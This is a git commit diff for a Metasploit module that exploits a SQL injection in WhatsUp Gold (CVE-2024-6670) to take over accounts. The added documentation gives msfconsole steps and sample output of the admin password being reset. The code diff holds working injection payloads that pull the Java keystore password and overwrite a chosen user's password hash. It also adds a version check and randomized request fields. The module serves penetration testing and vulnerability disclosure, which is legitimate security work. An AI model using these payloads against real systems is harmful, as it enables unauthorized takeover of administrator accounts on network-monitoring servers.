cleanup, version check, documentation

h4x-x0r · h4x-x0r · commit 64f595c4314f · 2024-09-02T15:41:08.000+01:00
diff --git a/documentation/modules/auxiliary/admin/http/whatsup_gold_sqli.md b/documentation/modules/auxiliary/admin/http/whatsup_gold_sqli.md
@@ -0,0 +1,53 @@
+## Vulnerable Application
+
+This module exploits a SQL injection vulnerability in WhatsUp Gold < v24.0.0 (CVE-2024-6670), by changing the password of an existing user
+(such as of the default `admin` account) to an attacker-controlled one.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://cdn.ipswitch.com/nm/WhatsUpGold/23.1.3/WhatsUpGold-23.1.3-FullInstall.exe).
+
+Installation instructions are available [here](https://docs.progress.com/bundle/whatsupgold-install-23-1/page/Prior-to-installation.html).
+
+**Successfully tested on**
+
+- WhatsUp Gold v23.1.3 on Windows 22H2
+- WhatsUp Gold v23.1.2 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/admin/http/whatsup_gold_sqli 
+msf6 auxiliary(admin/http/whatsup_gold_sqli) > set RHOSTS <IP>
+msf6 auxiliary(admin/http/whatsup_gold_sqli) > run
+```
+
+This should update the password of the default `admin` account.
+
+## Options
+
+### USERNAME
+The user of which to update the password (default: admin)
+
+### PASSWORD
+The new password for the user
+
+## Scenarios
+
+Running the exploit against WhatsUp Gold v23.1.3 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(admin/http/whatsup_gold_sqli) > run
+[*] Running module against 192.168.217.143
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version: 23.1.3
+[+] New password for admin was successfully set:
+	admin:SzESLHhWxKyf
+[+] Login at: https://192.168.217.143/NmConsole/#home
+[*] Auxiliary module execution completed
+```
diff --git a/modules/auxiliary/admin/http/whatsup_gold_sqli.rb b/modules/auxiliary/admin/http/whatsup_gold_sqli.rb
@@ -1,17 +1,18 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
-  # prepend Msf::Exploit::Remote::AutoCheck
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
 
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name' => 'WhatsUp Gold SQL Injection (CVE-2024-6670)',
         'Description' => %q{
-          This module exploits a SQL injection vulnerability in WhatsUp Gold, by changing the password of the admin user
+          This module exploits a SQL injection vulnerability in WhatsUp Gold, by changing the password of an existing user (such as of the default admin account)
           to an attacker-controlled one.
 
-          WhatsUp Gold < v24.0 are affected.
+          WhatsUp Gold versions < v24.0.0 are affected.
         },
         'Author' => [
           'Michael Heinzl', # MSF Module
@@ -44,6 +45,28 @@ def initialize(info = {})
     ])
   end
 
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'NmConsole/app.json')
+    })
+
+    return CheckCode::Unknown unless res && res.code == 200
+
+    data = res.body
+    version = data.match(/"path":"app-(.*?)\.js"/)[1]
+
+    if version.nil?
+      return CheckCode::Unknown
+    else
+      vprint_status('Version retrieved: ' + version)
+    end
+
+    return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('23.1.3')
+
+    Exploit::CheckCode::Safe
+  end
+
   def run
     body = {
       KeyStorePassword: datastore['NEW_PASSWORD'],
@@ -71,11 +94,11 @@ def run
     body = {
       deviceId: deviceid.to_s,
       classId: "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='#{marker}'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--",
-      range: '1',
-      n: '1',
-      start: '3',
-      end: '4',
-      businesdsHoursId: '5'
+      range: rand(1..9).to_s,
+      n: rand(1..9).to_s,
+      start: rand(1..9).to_s,
+      end: rand(1..9).to_s,
+      businesdsHoursId: rand(1..9).to_s
     }.to_json
 
     res = send_request_cgi(
@@ -119,15 +142,16 @@ def run
     byte_v = display_name_f.split(',')
     hex_v = byte_v.map { |value| value.to_i.to_s(16).upcase.rjust(2, '0') }
     enc_pass = '0x' + hex_v.join
+    vprint_status('Encrypted password: ' + enc_pass)
 
     body = {
       deviceId: deviceid.to_s,
       classId: "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = #{enc_pass} where sUserName = '#{datastore['USERNAME']}';--",
-      range: '1',
-      n: '1',
-      start: '3',
-      end: '4',
-      businesdsHoursId: '5'
+      range: rand(1..9).to_s,
+      n: rand(1..9).to_s,
+      start: rand(1..9).to_s,
+      end: rand(1..9).to_s,
+      businesdsHoursId: rand(1..9).to_s
     }.to_json
 
     res = send_request_cgi(
@@ -163,7 +187,7 @@ def run
     end
 
     store_valid_credential(user: datastore['USERNAME'], private: datastore['NEW_PASSWORD'], proof: json.to_s)
-    print_good("New #{datastore['USERNAME']} password was successfully set:\n\t#{datastore['USERNAME']}:#{datastore['NEW_PASSWORD']}")
+    print_good("New password for #{datastore['USERNAME']} was successfully set:\n\t#{datastore['USERNAME']}:#{datastore['NEW_PASSWORD']}")
     print_good("Login at: #{full_uri(normalize_uri(target_uri, 'NmConsole/#home'))}")
   end
 end
